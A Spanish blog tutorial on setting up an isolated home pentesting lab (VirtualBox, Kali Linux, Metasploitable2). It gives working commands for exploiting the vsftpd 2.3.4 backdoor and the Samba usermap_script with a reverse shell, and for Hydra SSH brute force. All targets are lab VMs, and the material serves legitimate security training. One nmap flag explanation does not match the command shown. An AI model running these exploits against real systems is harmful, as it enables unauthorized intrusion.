Llevo años trasteando con seguridad informática y, si algo he aprendido sobre la marcha, es que la mayoría de veces he aprovechado mi propia red o la red de mi trabajo para descubrir vulnerabilidades y evitar posibles fallos de seguridad.
En esta entrada de blog podrás realizar tus propias prácticas en un entorno virtual, seguro y totalmente legal. Con un portátil normal, un poco de RAM libre y software gratuito, puedes montarte tu propio campo de pruebas: un laboratorio de pentesting casero, aislado de tu red doméstica, donde puedes romper cosas, fallar, reiniciar y volver a intentarlo tantas veces como haga falta, sin miedo a estropear nada ni meterte en un lío.
Todo el contenido publicado en esta entrada tiene fines exclusivamente educativos y está orientado a promover el aprendizaje responsable. No fomentamos ni apoyamos el uso indebido de las técnicas explicadas, y no nos hacemos responsables de cualquier acción ilegal o malintencionada que terceros puedan realizar con esta información. El objetivo es aprender, practicar y mejorar habilidades de forma ética y segura.
Aquí te explico, paso a paso, cómo montar tu propio laboratorio con VirtualBox, Kali Linux como máquina atacante y Metasploitable2 como máquina víctima. Es la misma base que utilizan academias y bootcamps de ciberseguridad, y es exactamente por donde yo empecé cuando quise pasar de la teoría a la práctica. Si ya leíste mi entrada sobre plataformas para practicar hacking ético, este es el siguiente paso natural: tener tu propio entorno 100% controlado, sin depender de servidores externos ni de conexión a internet.
Vamos al lío.
Índice
- ¿Qué es un laboratorio de pentesting y por qué te interesa tener uno?
- Requisitos de hardware y software
- Paso 1: Instalar VirtualBox
- Paso 2: Descargar e instalar Kali Linux
- Paso 3: Descargar e importar Metasploitable2
- Paso 4: Configurar la red interna (aislamiento total)
- Paso 5: Comprobar que todo funciona
- Primeros ejercicios para practicar
- Buenas prácticas y errores que cometí yo
- Conclusión
1. ¿Qué es un laboratorio de pentesting y por qué te interesa tener uno?
Un laboratorio de pentesting es, básicamente, una red virtual privada que vive dentro de tu propio ordenador. En ella tienes al menos dos máquinas virtuales:
- Una máquina atacante, normalmente Kali Linux, cargada con herramientas de auditoría de seguridad (Nmap, Metasploit, Burp Suite, Wireshark, John the Ripper, etc.).
- Una o varias máquinas víctima, sistemas con vulnerabilidades conocidas y documentadas, creados específicamente para que los ataques.
Todo esto corre sobre un hipervisor (el programa que virtualiza los sistemas) y se comunica a través de una red virtual aislada, que no toca tu red doméstica ni internet salvo que tú lo permitas expresamente.
¿Por qué merece la pena? Porque leer sobre una vulnerabilidad SQL injection y explotarla tú mismo con tus manos son dos experiencias completamente distintas. El laboratorio es el sitio donde la teoría se convierte en habilidad real, y es prácticamente un requisito si te planteas dedicarte profesionalmente a la ciberseguridad.
2. Requisitos de hardware y software
No hace falta una bestia parda, pero tampoco vale cualquier cosa:
- RAM: mínimo 8 GB, aunque con 16 GB vas mucho más desahogado si quieres tener varias VMs abiertas a la vez.
- CPU: cualquier procesador de los últimos 6-7 años sirve, siempre que soporte virtualización por hardware.
- Virtualización activada en la BIOS/UEFI: busca la opción Intel VT-x o AMD-V y actívala si no lo está. Sin esto, VirtualBox va a rendimiento de tortuga o directamente no arranca las VMs de 64 bits.
- Espacio en disco: al menos 40-50 GB libres, preferiblemente en un SSD.
- Software: todo el que vamos a usar es gratuito.
3. Paso 1: Instalar VirtualBox
Uso VirtualBox en lugar de VMware Workstation Player por un motivo muy concreto: la versión gratuita de VMware solo te deja ejecutar una VM a la vez, y en un laboratorio necesitas mínimo dos funcionando simultáneamente (atacante y víctima). VirtualBox no tiene esa limitación y además es de código abierto.
- Descarga VirtualBox desde su web oficial (virtualbox.org) para tu sistema operativo.
- Instálalo con las opciones por defecto.
- Instala también el Extension Pack, que añade soporte USB 2.0/3.0 y otras funciones útiles.
Si no sabes cómo montar un máquina virtual, te dejo este otro artículo que te puede ayudar cómo crear una máquina virtual
4. Paso 2: Descargar e instalar Kali Linux
Kali es la distribución de referencia para pentesting: viene con más de 600 herramientas de seguridad preinstaladas, así que te ahorras montarte el entorno herramienta por herramienta.
- Ve a la web oficial de Kali y descarga la imagen preconfigurada para VirtualBox (formato
.ova), no la ISO, así te ahorras la instalación manual. - En VirtualBox: Archivo > Importar servicio virtualizado y selecciona el archivo descargado.
- Asígnale al menos 2-4 GB de RAM y 2 núcleos de CPU.
- Arranca la máquina. Las credenciales por defecto son
kali/kali. Cámbialas nada más entrar. - Abre una terminal y actualiza el sistema:
sudo apt update && sudo apt upgrade -y
5. Paso 3: Descargar e importar Metasploitable2
Metasploitable2 es una máquina Linux creada expresamente para ser vulnerable: tiene más de 30 servicios mal configurados (FTP, SSH, Samba, bases de datos…) listos para que los explotes.
- Descárgala desde SourceForge o VulnHub.
- Descomprime el archivo y en VirtualBox importa el
.vmdkcomo disco de una nueva máquina. - Asígnale 512 MB – 1 GB de RAM, es una máquina muy ligera.
- No la conectes nunca a tu red externa ni a internet. Está diseñada para ser vulnerable a propósito; si la expones, cualquiera podría comprometerla y usarla como puerta de entrada a tu red doméstica.
6. Paso 4: Configurar la red interna (aislamiento total)
Este es el paso que más gente se salta y el que más disgustos evita. La idea es que Kali y Metasploitable se vean entre sí, pero no vean ni sean vistas por tu red doméstica.
Opción recomendada: Red interna (Internal Network)
- Selecciona la VM de Kali > Configuración > Red.
- En el Adaptador 1, elige «Red Interna» y ponle un nombre, por ejemplo
labpentest. - Haz lo mismo en Metasploitable, usando el mismo nombre de red interna.
- Si quieres que Kali tenga acceso a internet para actualizar herramientas, añade un segundo adaptador en modo NAT solo en la VM de Kali.
La topología final queda así:
Tu red doméstica (no tocada)
│
└── Red Interna "labpentest" (aislada)
├── Kali Linux (atacante) → 192.168.56.101
└── Metasploitable2 (víctima) → 192.168.56.102
7. Paso 5: Comprobar que todo funciona
Arranca ambas máquinas y, desde Kali, abre una terminal:
ip a
Anota la IP de Kali dentro de la red interna. Luego haz ping a Metasploitable:
ping 192.168.56.102
Si obtienes respuesta, tu laboratorio está operativo y aislado. Este es el momento en el que, la primera vez que lo hice, sentí que por fin tenía un sitio propio donde equivocarme sin consecuencias.
Primeros ejercicios para practicar
Con el laboratorio montado, estos son ejercicios clásicos para arrancar:
Escaneo de puertos con Nmap
- descubre qué servicios están corriendo en Metasploitable.
- Antes de atacar nada, necesitas saber qué hay ahí fuera. Desde Kali, lanza un escaneo de puertos con detección de versión de servicio:
nmap -sV 192.168.56.102
El flag -p- escanea los 65535 puertos (no solo los 1000 más comunes) y -sV intenta identificar la versión exacta de cada servicio. En Metasploitable2 vas a ver una lista larga: FTP en el puerto 21, SSH en el 22, Telnet en el 23, SMTP en el 25, DNS, HTTP en el 80, RPC, Samba en el 139/445, MySQL en el 3306… Cada uno de esos puertos abiertos es una puerta que puedes investigar.
Apunta las versiones exactas que te devuelva Nmap. Por ejemplo, si ves algo como vsftpd 2.3.4 en el puerto 21, ya tienes tu siguiente paso: buscar si esa versión concreta tiene vulnerabilidades conocidas.
Cada vez que rompas algo (y créeme, lo vas a romper), simplemente restauras la máquina virtual desde una snapshot y sigues probando. Sin coste, sin miedo.
searchsploit vsftpd 2.3.4
searchsploit (incluido en Kali) busca en la base de datos local de Exploit-DB. Te va a devolver un exploit llamado «vsftpd 2.3.4 – Backdoor Command Execution», que es justo el que vamos a usar en el siguiente ejercicio.
Explotar el backdoor de vsftpd 2.3.4
Esta es la puerta de entrada clásica en Metasploitable2, perfecta para un primer «acceso root» real. La versión 2.3.4 de vsftpd que trae instalada contiene una puerta trasera intencionada.
Abre Metasploit:
msfconsole
Dentro de la consola, busca y selecciona el exploit:
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.102
show options
show options te enseña qué parámetros necesita el módulo antes de lanzarlo; en este caso, con fijar RHOSTS (la IP de la víctima) suele ser suficiente. Cuando esté todo listo, ejecuta:
exploit
Si todo va bien, obtienes una sesión de shell con privilegios de root sobre Metasploitable2, sin haber introducido usuario ni contraseña. Confírmalo con:
whoami
id
Este ejercicio es una demostración perfecta de por qué mantener el software actualizado es crítico: una versión desactualizada y sin parchear puede regalar acceso total al sistema.
Explotar Samba con usermap_script
Otro clásico de Metasploitable2. El servicio Samba (puertos 139/445) trae una versión vulnerable a inyección de comandos a través del parámetro username map script.
msfconsole
search samba usermap
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.102
set payload cmd/unix/reverse
set LHOST 192.168.56.101
exploit
Aquí LHOST es la IP de tu propia Kali, porque estamos usando un payload de tipo «reverse shell»: la máquina víctima se conecta de vuelta a ti en lugar de al revés. Si el exploit funciona, caes directamente en una shell de root sobre Metasploitable2.
Fuerza bruta de contraseñas con Hydra
Metasploitable2 tiene un servicio SSH (puerto 22) con usuarios y contraseñas débiles, ideal para practicar ataques de fuerza bruta con diccionario. Kali incluye diccionarios de contraseñas comunes en /usr/share/wordlists/, entre ellos rockyou.txt (hay que descomprimirlo la primera vez):
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
Lanza el ataque contra el usuario msfadmin (uno de los usuarios por defecto de Metasploitable2):
hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.102
-l fija el usuario y -P indica el diccionario de contraseñas a probar una por una. Hydra te avisará en cuanto encuentre una combinación válida. Es un ejercicio lento pero muy ilustrativo de por qué una contraseña débil sigue siendo, a día de hoy, una de las puertas de entrada más explotadas en entornos reales.
Capturar y analizar tráfico con Wireshark
Mientras ejecutas cualquiera de los ejercicios anteriores, abre Wireshark en Kali y captura tráfico en la interfaz de la red interna (normalmente eth1 o la que corresponda a labpentest):
sudo wireshark
Selecciona la interfaz correcta y filtra por la IP de la víctima para quedarte solo con el tráfico relevante:
ip.addr == 192.168.56.102
Observa cómo viaja cada paquete: en el ataque de Hydra verás decenas de intentos de conexión SSH en segundos; en el exploit de Samba verás el handshake del protocolo SMB antes de la ejecución del comando. Ver «por dentro» lo que antes solo ejecutabas como comando es, para mí, el momento en el que de verdad se entiende cómo funciona un ataque, no solo cómo se lanza.
Cada vez que rompas algo (y créeme, lo vas a romper), simplemente restauras la máquina virtual desde una snapshot y sigues probando. Sin coste, sin miedo. Cuando domines estos cinco ejercicios, el siguiente paso natural es probar máquinas de VulnHub o HackTheBox, que plantean retos con niveles de dificultad crecientes y menos pistas que Metasploitable2.
Buenas prácticas y errores que cometí yo
Un par de cosas que aprendí a base de tropezar:
- Haz snapshots antes de cada sesión de pruebas. Te va a salvar horas de reinstalación.
- Discos de tamaño fijo, no dinámicos, si tu disco duro lo permite: el rendimiento mejora bastante.
- Nunca mezcles la red del laboratorio con tu red doméstica, ni «solo un momento». Es la forma más habitual de acabar con un dolor de cabeza innecesario.
- Documenta lo que haces. Apunta comandos, resultados, capturas. Con el tiempo, ese cuaderno de notas se convierte en un portafolio que puedes enseñar en una entrevista de trabajo.
Conclusión
Montar tu propio laboratorio de pentesting no es complicado ni caro: con un portátil decente, VirtualBox, Kali Linux y Metasploitable2 tienes todo lo necesario para empezar a practicar hacking ético de forma legal, segura y repetible. Es, sin duda, la mejor inversión de tiempo que puedes hacer si te interesa la ciberseguridad en serio.
Yo sigo usando variaciones de este mismo montaje años después, añadiendo máquinas víctima nuevas de VulnHub o HackTheBox cuando quiero un reto distinto. Es un entorno que crece contigo.
Si te animas a montarlo, cuéntame en los comentarios qué tal te ha ido o si te atascas en algún paso. Y si quieres seguir subiendo el nivel, en la próxima entrada hablaremos de cómo añadir más máquinas víctima y simular topologías de red más realistas.


